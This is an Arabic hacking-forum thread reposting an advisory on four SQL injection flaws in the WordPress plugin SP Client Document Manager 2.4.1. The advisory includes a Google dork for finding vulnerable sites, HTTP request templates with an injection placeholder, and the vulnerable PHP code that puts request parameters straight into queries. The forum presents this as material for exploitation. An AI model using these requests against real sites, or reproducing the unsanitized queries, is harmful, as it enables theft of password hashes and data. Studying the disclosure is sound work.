ثغرة WordPress SP Client Document Manager 2.4.1 SQL Injection Vulnerability

ثغرات المواقع والسيرفرات وكيفية استغلالها وشروحات مع تطبيقات عملية على استغلال الثغرات وتطبيقها


إضافة رد
قديم 11-22-2014
  #1
Cwne
Administrator
 الصورة الرمزية Cwne
 
تاريخ التسجيل: Mar 2004
الدولة: Palestine
المشاركات: 418
شكراً: 283
تم شكره 95 مرة في 84 مشاركة
افتراضي ثغرة WordPress SP Client Document Manager 2.4.1 SQL Injection Vulnerability



السلام عليكم ورحمة الله وبركاته شباب .
جبت لكم ثغرة نازلة بتاريخ اليوم
السكربت المصاب فيها وورد بريس
نوع الثغرة SQL Injection

كود PHP:
Vulnerability titleMultiple SQL Injection in SP Client Document Manager plugin
Plugin
SP Client Document Manager
Vendor
http://smartypantsplugins.com
Producthttps://wordpress.org/plugins/sp-client-document-manager/
Affected versionversion 2.4.1 and previous version
Fixed version
N/A
Google dork
inurl:wp-content/plugins/sp-client-document-manager
Reported by
Dang Quoc Thai thai.q.dang (atitas (dotvn
Credits to ITAS Team 
www.itas.vn
 
 
::DESCRITION::
 
Multiple SQL injection vulnerability has been found and confirmed within the software as an anonymous userA successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the databaseThe following URL and parameter has been confirmed to suffer from SQL injection
 
Link 1:
 
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host
target.org
User
-AgentMozilla/5.0 (Windows NT 6.2WOW64rv:33.0Gecko/20100101 Firefox/33.0
Accept
text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
vendor_email[]=<SQL Injection>
 
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
    function email_vendor()
    {
        global $wpdb, $current_user;
        if (count($_POST['vendor_email']) == 0) {
            echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
        } else {
            $files = implode(",", $_POST['vendor_email']);
            echo "SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")"."\n";
            $r     = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")", ARRAY_A);
 
 
 
Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
*;q=0.8
Accept
-Languageen-US,en;q=0.5
Accept
-Encodinggzipdeflate
Cookie
PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection
keep-alive
 
Vulnerable file
:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code
: (Line1462 -> 1479)
 
function 
download_project()
    {
        global 
$wpdb$current_user;
        
$user_ID     $_GET['id'];
        
$r           $wpdb->get_results("SELECT *  FROM " $wpdb->prefix "sp_cu   where pid = $user_ID  order by date desc"ARRAY_A);
        
$r_project   $wpdb->get_results("SELECT *  FROM " $wpdb->prefix "sp_cu_project where id = $user_ID  "ARRAY_A);
        
$return_file "" preg_replace('/[^\w\d_ -]/si'''stripslashes($r_project[0]['name'])) . ".zip";
        
$zip         = new Zip();
        
$dir         '' SP_CDM_UPLOADS_DIR '' $r_project[0]['uid'] . '/';
        
$path        '' SP_CDM_UPLOADS_DIR_URL '' $r_project[0]['uid'] . '/';
        
[email protected]($dir.$return_file);
        
for ($i 0$i count($r); $i++) {
            
$zip->addFile(file_get_contents($dir $r[$i]['file']), $r[$i]['file'], filectime($dir $r[$i]['file']));
        }
        
$zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        
$zip->setZipFile($dir $return_file);
        
header("Location: " $path $return_file "");
    }
 
Link 3http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL InjectionHTTP/1.1
Host
target.org
User
-AgentMozilla/5.0 (Windows NT 6.1WOW64rv:33.0Gecko/20100101 Firefox/33.0
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
 
function download_archive()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
        $return_file = "Account.zip";
        $zip         = new Zip();
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where uid = $user_ID  order by date desc", ARRAY_A);
        [email protected]($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
  
Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
*;q=0.8
Accept
-Languageen-US,en;q=0.5
Accept
-Encodinggzipdeflate
Cookie
PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection
keep-alive
Vulnerable file
:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code
: (Line1480 -> 1496)
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code
: (Line368 -> 372)
 
    function 
remove_cat()
    {
        global 
$wpdb$current_user;
        
$wpdb->query("DELETE FROM " $wpdb->prefix "sp_cu_project WHERE id = " $_REQUEST['id'] . "  ");
        
$wpdb->query("DELETE FROM " $wpdb->prefix "sp_cu WHERE pid = " $_REQUEST['id'] . "  ");
}  

 
::
DISCLOSURE::
10/30/2014Notify to vendor vendor does not response
11/08/2014Notify to vendor Vendor blocks IPs from Vietnam
11/05/2014Notify to vendor vendor does not response
11/20/2014: Public information 
هذا شرح لها على اليوتيوب
https://www.youtube.com/watch?v=AR3xCcuEJHc
__________________
!! لآ تتعلم لتخترق ~ إخترق لتتعلم !!
Cwne غير متواجد حالياً  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Cwne على المشاركة المفيدة:
قديم 11-22-2014
  #2
طائر العنقاء
فلسطين وطني
 الصورة الرمزية طائر العنقاء
 
تاريخ التسجيل: Apr 2008
الدولة: ||- أبحث عن وطني بين ركام الارض -||
العمر: 34
المشاركات: 3,648
شكراً: 437
تم شكره 623 مرة في 424 مشاركة
افتراضي رد: ثغرة WordPress SP Client Document Manager 2.4.1 SQL Injection Vulnerability

كم انت رائع ومبدع
__________________

أنا لا أكره الناس ... ولا أسطو على أحد




ولكني إذا ما جعت ... آكل لحم مغتصبي

حذاري من جوعي ومن غضبي

All Things Are Difficult Before They Are Easy

ραℓєѕтιηє ρнσєηιχ


طائر العنقاء غير متواجد حالياً  
رد مع اقتباس
قديم 11-22-2014
  #3
Cwne
Administrator
 الصورة الرمزية Cwne
 
تاريخ التسجيل: Mar 2004
الدولة: Palestine
المشاركات: 418
شكراً: 283
تم شكره 95 مرة في 84 مشاركة
افتراضي رد: ثغرة WordPress SP Client Document Manager 2.4.1 SQL Injection Vulnerability

اهلا وسهلا بك يا طائر العنقاء .
__________________
!! لآ تتعلم لتخترق ~ إخترق لتتعلم !!
Cwne غير متواجد حالياً  
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Interactivefx.ie CMS SQL Injection Vulnerability HaCkEr SToOop عالم الثغرات - Vulnerabilities World 1 06-08-2010 05:39 PM
ثغرة خطيرة في سكريبت Wordpress + الاستغلال pia اختراق المواقع والسيرفرات 5 03-03-2010 02:53 PM
SQL Injection Vulnerability [email protected] M!ND عالم الثغرات - Vulnerabilities World 6 12-21-2009 08:17 PM
Remote SQL Injection Vulnerability HaCkEr SToOop عالم الثغرات - Vulnerabilities World 1 11-24-2009 04:43 PM
Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability مشاعر انسان111 اختراق المواقع والسيرفرات 8 03-20-2009 01:51 AM


الساعة الآن 12:13 AM.